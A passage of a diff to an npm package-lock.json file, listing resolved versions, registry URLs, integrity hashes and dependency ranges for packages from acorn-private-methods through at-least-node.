"resolved": "https://registry.npmjs.org/acorn-private-methods/-/acorn-private-methods-0.3.3.tgz", + "integrity": "sha512-46oeEol3YFvLSah5m9hGMlNpxDBCEkdceJgf01AjqKYTK9r6HexKs2rgSbLK81pYjZZMonhftuUReGMlbbv05w==", + "dev": true, + "dependencies": { + "acorn-private-class-elements": "^0.2.7" + }, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^6 || ^7 || ^8" + } + }, + "node_modules/acorn-stage3": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/acorn-stage3/-/acorn-stage3-4.0.0.tgz", + "integrity": "sha512-BR+LaADtA6GTB5prkNqWmlmCLYmkyW0whvSxdHhbupTaro2qBJ95fJDEiRLPUmiACGHPaYyeH9xmNJWdGfXRQw==", + "dev": true, + "dependencies": { + "acorn-class-fields": "^0.3.7", + "acorn-private-methods": "^0.3.3", + "acorn-static-class-features": "^0.2.4" + }, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^7.4 || ^8" + } + }, + "node_modules/acorn-static-class-features": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/acorn-static-class-features/-/acorn-static-class-features-0.2.4.tgz", + "integrity": "sha512-5X4mpYq5J3pdndLmIB0+WtFd/mKWnNYpuTlTzj32wUu/PMmEGOiayQ5UrqgwdBNiaZBtDDh5kddpP7Yg2QaQYA==", + "dev": true, + "dependencies": { + "acorn-private-class-elements": "^0.2.7" + }, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^6.1.0 || ^7 || ^8" + } + }, + "node_modules/acorn-walk": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-7.2.0.tgz", + "integrity": "sha512-OPdCF6GsMIP+Az+aWfAAOEt2/+iVDKE7oy6lJ098aoe59oAmK76qV6Gw60SbZ8jHuG2wH058GF4pLFbYamYrVA==", + "dev": true, + 
"engines": { + "node": ">=0.4.0" + } + }, + "node_modules/adjust-sourcemap-loader": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/adjust-sourcemap-loader/-/adjust-sourcemap-loader-4.0.0.tgz", + "integrity": "sha512-OXwN5b9pCUXNQHJpwwD2qP40byEmSgzj8B4ydSN0uMNYWiFmJ6x6KwUllMmfk8Rwu/HJDFR7U8ubsWBoN0Xp0A==", + "dev": true, + "dependencies": { + "loader-utils": "^2.0.0", + "regex-parser": "^2.2.11" + }, + "engines": { + "node": ">=8.9" + } + }, + "node_modules/adm-zip": { + "version": "0.5.16", + "resolved": "https://registry.npmjs.org/adm-zip/-/adm-zip-0.5.16.tgz", + "integrity": "sha512-TGw5yVi4saajsSEgz25grObGHEUaDrniwvA2qwSC060KfqGPdglhvPMA2lPIoxs3PQIItj2iag35fONcQqgUaQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.0" + } + }, + "node_modules/agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "dependencies": { + "debug": "4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/aggregate-error": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/aggregate-error/-/aggregate-error-3.1.0.tgz", + "integrity": "sha512-4I7Td01quW/RpocfNayFdFVk1qSuoh0E7JrbRJ16nH01HhKFQ88INq9Sd+nd72zqRySlr9BmDA8xlEJ6vJMrYA==", + "dependencies": { + "clean-stack": "^2.0.0", + "indent-string": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/ajv": { + "version": "6.12.6", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", + "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "fast-json-stable-stringify": "^2.0.0", + "json-schema-traverse": "^0.4.1", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/ajv-formats": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/ajv-formats/-/ajv-formats-2.1.1.tgz", + "integrity": "sha512-Wx0Kx52hxE7C18hkMEggYlEifqWZtYaRgouJor+WMdPnQyEK13vgEWyVNup7SoeeoLMsr4kf5h6dOW11I15MUA==", + "dependencies": { + "ajv": "^8.0.0" + }, + "peerDependencies": { + "ajv": "^8.0.0" + }, + "peerDependenciesMeta": { + "ajv": { + "optional": true + } + } + }, + "node_modules/ajv-formats/node_modules/ajv": { + "version": "8.11.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.11.0.tgz", + "integrity": "sha512-wGgprdCvMalC0BztXvitD2hC04YffAvtsUn93JbGXYLAtCUO4xd17mCCZQxUOItiBwZvJScWo8NIvQMQ71rdpg==", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/ajv-formats/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" + }, + "node_modules/ajv-keywords": { + "version": "3.5.2", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-3.5.2.tgz", + "integrity": "sha512-5p6WTN0DdTGVQk6VjcEju19IgaHudalcfabD7yhDGeA6bcQnmL+CpveLJq/3hvfwd1aof6L386Ougkx6RfyMIQ==", + "dev": true, + "peerDependencies": { + "ajv": "^6.9.1" + } + }, + "node_modules/algoliasearch": { + "version": "3.35.1", + 
"resolved": "https://registry.npmjs.org/algoliasearch/-/algoliasearch-3.35.1.tgz", + "integrity": "sha512-K4yKVhaHkXfJ/xcUnil04xiSrB8B8yHZoFEhWNpXg23eiCnqvTZw1tn/SqvdsANlYHLJlKl0qi3I/Q2Sqo7LwQ==", + "dev": true, + "dependencies": { + "agentkeepalive": "^2.2.0", + "debug": "^2.6.9", + "envify": "^4.0.0", + "es6-promise": "^4.1.0", + "events": "^1.1.0", + "foreach": "^2.0.5", + "global": "^4.3.2", + "inherits": "^2.0.1", + "isarray": "^2.0.1", + "load-script": "^1.0.0", + "object-keys": "^1.0.11", + "querystring-es3": "^0.2.1", + "reduce": "^1.0.1", + "semver": "^5.1.0", + "tunnel-agent": "^0.6.0" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/algoliasearch/node_modules/agentkeepalive": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/agentkeepalive/-/agentkeepalive-2.2.0.tgz", + "integrity": "sha1-xdG9SxKQCPEWPyNvhuX66iAm4u8=", + "dev": true, + "engines": { + "node": ">= 0.10.0" + } + }, + "node_modules/algoliasearch/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/algoliasearch/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=", + "dev": true + }, + "node_modules/algoliasearch/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "dev": true, + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/ally.js": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/ally.js/-/ally.js-1.4.1.tgz", + "integrity": "sha512-ZewdfuwP6VewtMN36QY0gmiyvBfMnmEaNwbVu2nTS6zRt069viTgkYgaDiqu6vRJ1VJCriNqV0jGMu44R8zNbA==", + "dev": true, + "dependencies": { + "css.escape": "^1.5.0", + "platform": "1.3.3" + } + }, + "node_modules/ally.js/node_modules/platform": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/platform/-/platform-1.3.3.tgz", + "integrity": "sha512-VJK1SRmXBpjwsB4YOHYSturx48rLKMzHgCqDH2ZDa6ZbMS/N5huoNqyQdK5Fj/xayu3fqbXckn5SeCS1EbMDZg==", + "dev": true + }, + "node_modules/ansi-color": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/ansi-color/-/ansi-color-0.2.1.tgz", + "integrity": "sha512-bF6xLaZBLpOQzgYUtYEhJx090nPSZk1BQ/q2oyBK9aMMcJHzx9uXGCjI2Y+LebsN4Jwoykr0V9whbPiogdyHoQ==", + "engines": { + "node": "*" + } + }, + "node_modules/ansi-colors": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/ansi-colors/-/ansi-colors-4.1.3.tgz", + "integrity": "sha512-/6w/C21Pm1A7aZitlI5Ni/2J6FFQN8i1Cvz3kHABAAbw93v/NlvKdVOqz7CCWz/3iv/JplRSEEZ83XION15ovw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/ansi-escapes": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", + "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "dev": true, + "dependencies": { + "type-fest": "^0.21.3" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/ansi-escapes/node_modules/type-fest": { + "version": "0.21.3", + "resolved": 
"https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", + "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/ansi-html": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/ansi-html/-/ansi-html-0.0.9.tgz", + "integrity": "sha512-ozbS3LuenHVxNRh/wdnN16QapUHzauqSomAl1jwwJRRsGwFwtj644lIhxfWu0Fy0acCij2+AEgHvjscq3dlVXg==", + "dev": true, + "engines": [ + "node >= 0.8.0" + ], + "license": "Apache-2.0", + "bin": { + "ansi-html": "bin/ansi-html" + } + }, + "node_modules/ansi-html-community": { + "version": "0.0.8", + "resolved": "https://registry.npmjs.org/ansi-html-community/-/ansi-html-community-0.0.8.tgz", + "integrity": "sha512-1APHAyr3+PCamwNw3bXCPp4HFLONZt/yIH0sZp0/469KWNTEy+qN5jQ3GVX6DMZ1UXAi34yVwtTeaG/HpBuuzw==", + "dev": true, + "engines": [ + "node >= 0.8.0" + ], + "bin": { + "ansi-html": "bin/ansi-html" + } + }, + "node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/ansi-styles": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", + "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "dev": true, + "dependencies": { + "color-convert": "^1.9.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/ansi-styles/node_modules/color-convert": { + "version": "1.9.3", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", + "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "dev": true, + "dependencies": { + "color-name": "1.1.3" + } + }, + "node_modules/ansi-styles/node_modules/color-name": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", + "integrity": "sha1-p9BVi9icQveV3UIyj3QIMcpTvCU=", + "dev": true + }, + "node_modules/anymatch": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", + "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dev": true, + "dependencies": { + "normalize-path": "^3.0.0", + "picomatch": "^2.0.4" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/append-field": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz", + "integrity": "sha1-HjRA6RXwsSA9I3SOeO3XubW0PlY=" + }, + "node_modules/aproba": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/aproba/-/aproba-1.2.0.tgz", + "integrity": "sha512-Y9J6ZjXtoYh8RnXVCMOU/ttDmk1aBjunq9vO0ta5x85WDQiQfUF9sIPBITdbiiIVcBo03Hi3jMxigBtsddlXRw==" + }, + "node_modules/arch": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/arch/-/arch-2.2.0.tgz", + "integrity": "sha512-Of/R0wqp83cgHozfIYLbBMnej79U/SVGOOyuB3VVFv1NRM/PSFMK12x9KVtiYzJqmnU5WR2qp0Z5rHb7sWGnFQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + 
}, + "node_modules/archiver": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/archiver/-/archiver-5.3.2.tgz", + "integrity": "sha512-+25nxyyznAXF7Nef3y0EbBeqmGZgeN/BxHX29Rs39djAfaFalmQ89SE6CWyDCHzGL0yt/ycBtNOmGTW0FyGWNw==", + "dependencies": { + "archiver-utils": "^2.1.0", + "async": "^3.2.4", + "buffer-crc32": "^0.2.1", + "readable-stream": "^3.6.0", + "readdir-glob": "^1.1.2", + "tar-stream": "^2.2.0", + "zip-stream": "^4.1.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/archiver-utils": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/archiver-utils/-/archiver-utils-2.1.0.tgz", + "integrity": "sha512-bEL/yUb/fNNiNTuUz979Z0Yg5L+LzLxGJz8x79lYmR54fmTIb6ob/hNQgkQnIUDWIFjZVQwl9Xs356I6BAMHfw==", + "dependencies": { + "glob": "^7.1.4", + "graceful-fs": "^4.2.0", + "lazystream": "^1.0.0", + "lodash.defaults": "^4.2.0", + "lodash.difference": "^4.5.0", + "lodash.flatten": "^4.4.0", + "lodash.isplainobject": "^4.0.6", + "lodash.union": "^4.6.0", + "normalize-path": "^3.0.0", + "readable-stream": "^2.0.0" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/archiver-utils/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/archiver-utils/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/archiver-utils/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/are-we-there-yet": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-2.0.0.tgz", + "integrity": "sha512-Ci/qENmwHnsYo9xKIcUJN5LeDKdJ6R1Z1j9V/J5wyq8nh/mYPEpIKJbBZXtZjG04HiK7zV/p6Vs9952MrMeUIw==", + "dependencies": { + "delegates": "^1.0.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" + }, + "node_modules/args-js": { + "version": "0.10.12", + "resolved": "https://registry.npmjs.org/args-js/-/args-js-0.10.12.tgz", + "integrity": "sha1-oyeuqA5BByo9hfnCdNtlEeuV5Jw=", + "engines": { + "node": ">0.8.0", + "npm": ">1.1.0" + } + }, + "node_modules/aria-query": { + "version": "5.1.3", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.1.3.tgz", + "integrity": "sha512-R5iJ5lkuHybztUfuOAznmboyjWq8O6sqNqtK7CLOqdydi54VNbORp49mb14KbWgG1QD3JFO9hJdZ+y4KutfdOQ==", + "dev": true, + "dependencies": { + "deep-equal": "^2.0.5" + } + }, + "node_modules/arr-diff": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/arr-diff/-/arr-diff-4.0.0.tgz", + "integrity": 
"sha512-YVIQ82gZPGBebQV/a8dar4AitzCQs0jjXwMPZllpXMaGjXPYVUawSxQrRsjhjupyVxEvbHgUmIhKVlND+j02kA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/arr-flatten": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/arr-flatten/-/arr-flatten-1.1.0.tgz", + "integrity": "sha512-L3hKV5R/p5o81R7O02IGnwpDmkp6E982XhtbuwSe3O4qOtMMMtodicASA1Cny2U+aCXcNpml+m4dPsvsJ3jatg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/arr-union": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/arr-union/-/arr-union-3.1.0.tgz", + "integrity": "sha512-sKpyeERZ02v1FeCZT8lrfJq5u6goHCtpTAzPwJYe7c8SPFOboNjNg1vz2L4VTn9T4PQxEx13TbXLmYUcS6Ug7Q==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/array-buffer-byte-length": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/array-buffer-byte-length/-/array-buffer-byte-length-1.0.1.tgz", + "integrity": "sha512-ahC5W1xgou+KTXix4sAO8Ki12Q+jf4i0+tmk3sC+zgcynshkHxzpXdImBehiUYKKKDwvfFiJl1tZt6ewscS1Mg==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.5", + "is-array-buffer": "^3.0.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array-flatten": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz", + "integrity": "sha1-ml9pkFGx5wczKPKgCJaLZOopVdI=" + }, + "node_modules/array-from": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/array-from/-/array-from-2.1.1.tgz", + "integrity": "sha1-z+nYwmYoudxa7MYqn12PHzUsEZU=", + "dev": true + }, + "node_modules/array-includes": { + "version": "3.1.6", + "resolved": "https://registry.npmjs.org/array-includes/-/array-includes-3.1.6.tgz", + "integrity": "sha512-sgTbLvL6cNnw24FnbaDyjmvddQ2ML8arZsgaJhoABMoplz/4QRhtrYS+alr1BUM1Bwp6dhx8vVCBSLG+StwOFw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4", + "get-intrinsic": "^1.1.3", + "is-string": "^1.0.7" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array-union": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-1.0.2.tgz", + "integrity": "sha1-mjRBDk9OPaI96jdb5b5w8kd47Dk=", + "dependencies": { + "array-uniq": "^1.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/array-uniq": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/array-uniq/-/array-uniq-1.0.3.tgz", + "integrity": "sha1-r2rId6Jcx/dOBYiUdThY39sk/bY=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/array-unique": { + "version": "0.3.2", + "resolved": "https://registry.npmjs.org/array-unique/-/array-unique-0.3.2.tgz", + "integrity": "sha512-SleRWjh9JUud2wH1hPs9rZBZ33H6T9HOiL0uwGnGx9FpE6wKGyfWugmbkEOIs6qWrZhg0LWeLziLrEwQJhs5mQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/array.prototype.flat": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/array.prototype.flat/-/array.prototype.flat-1.2.5.tgz", + "integrity": "sha512-KaYU+S+ndVqyUnignHftkwc58o3uVU1jzczILJ1tN2YaIZpFIKBiP/x/j97E5MVPsaCloPbqWLB/8qCTVvT2qg==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3", + "es-abstract": "^1.19.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + 
"node_modules/array.prototype.flatmap": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/array.prototype.flatmap/-/array.prototype.flatmap-1.3.1.tgz", + "integrity": "sha512-8UGn9O1FDVvMNB0UlLv4voxRMze7+FpHyF5mSMRjWHUMlpoDViniy05870VlxhfgTnLbpuwTzvD76MTtWxB/mQ==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4", + "es-shim-unscopables": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array.prototype.tosorted": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/array.prototype.tosorted/-/array.prototype.tosorted-1.1.1.tgz", + "integrity": "sha512-pZYPXPRl2PqWcsUs6LOMn+1f1532nEoPTYowBtqLwAW+W8vSVhkIGnmOX1t/UQjD6YGI0vcD2B1U7ZFGQH9jnQ==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4", + "es-shim-unscopables": "^1.0.0", + "get-intrinsic": "^1.1.3" + } + }, + "node_modules/arraybuffer.prototype.slice": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/arraybuffer.prototype.slice/-/arraybuffer.prototype.slice-1.0.3.tgz", + "integrity": "sha512-bMxMKAjg13EBSVscxTaYA4mRc5t1UAXa2kXiGTNfZ079HIWXEkKmkgFrh/nJqamaLSrXO5H4WFFkPEaLJWbs3A==", + "license": "MIT", + "dependencies": { + "array-buffer-byte-length": "^1.0.1", + "call-bind": "^1.0.5", + "define-properties": "^1.2.1", + "es-abstract": "^1.22.3", + "es-errors": "^1.2.1", + "get-intrinsic": "^1.2.3", + "is-array-buffer": "^3.0.4", + "is-shared-array-buffer": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/arrify": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz", + "integrity": "sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug==", + "engines": { + "node": ">=8" + } + }, + "node_modules/asap": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", + "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" + }, + "node_modules/asn1": { + "version": "0.2.6", + "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", + "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", + "license": "MIT", + "dependencies": { + "safer-buffer": "~2.1.0" + } + }, + "node_modules/assert-never": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/assert-never/-/assert-never-1.2.1.tgz", + "integrity": "sha512-TaTivMB6pYI1kXwrFlEhLeGfOqoDNdTxjCdwRfFFkEA30Eu+k48W34nlok2EYWJfFFzqaEmichdNM7th6M5HNw==" + }, + "node_modules/assert-plus": { + "version": "0.1.5", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-0.1.5.tgz", + "integrity": "sha1-7nQAlBMALYTOxyGcasgRgS5yMWA=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/assertion-error": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/assertion-error/-/assertion-error-1.1.0.tgz", + "integrity": "sha512-jgsaNduz+ndvGyFt3uSuWqvy4lCnIJiovtouQN5JZHOKCS2QuhEdbcQHFhVksz2N2U9hXJo8odG7ETyWlEeuDw==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/assign-symbols": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assign-symbols/-/assign-symbols-1.0.0.tgz", + "integrity": "sha512-Q+JC7Whu8HhmTdBph/Tq59IoRtoy6KAm5zzPv00WdujX82lbAL8K7WVjne7vdCsAmbF4AYaDOPyO3k0kl8qIrw==", + "dev": true, + "engines": 
{ + "node": ">=0.10.0" + } + }, + "node_modules/ast-types": { + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.16.1.tgz", + "integrity": "sha512-6t10qk83GOG8p0vKmaCr8eiilZwO171AvbROMtvvNiwrTly62t+7XkA8RdIIVbpMhCASAsxgAzdRSwh6nw/5Dg==", + "dev": true, + "dependencies": { + "tslib": "^2.0.1" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/ast-types-flow": { + "version": "0.0.7", + "resolved": "https://registry.npmjs.org/ast-types-flow/-/ast-types-flow-0.0.7.tgz", + "integrity": "sha1-9wtzXGvKGlycItmCw+Oef+ujva0=", + "dev": true + }, + "node_modules/astral-regex": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", + "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/async": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/async/-/async-3.2.5.tgz", + "integrity": "sha512-baNZyqaaLhyLVKm/DlvdW051MSgO6b8eVfIezl9E5PqWxFgzLm/wQntEW4zOytVburDEr0JlALEpdOFwvErLsg==" + }, + "node_modules/async-lock": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/async-lock/-/async-lock-1.4.1.tgz", + "integrity": "sha512-Az2ZTpuytrtqENulXwO3GGv1Bztugx6TT37NIo7imr/Qo0gsYiGtSdBa2B6fsXhTpVZDNfu1Qn3pk531e3q+nQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/async-retry": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz", + "integrity": "sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw==", + "dependencies": { + "retry": "0.13.1" + } + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" + }, + "node_modules/at-least-node": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/at-least-node/-/at-least-node-1.0.0.tgz", + "integrity": 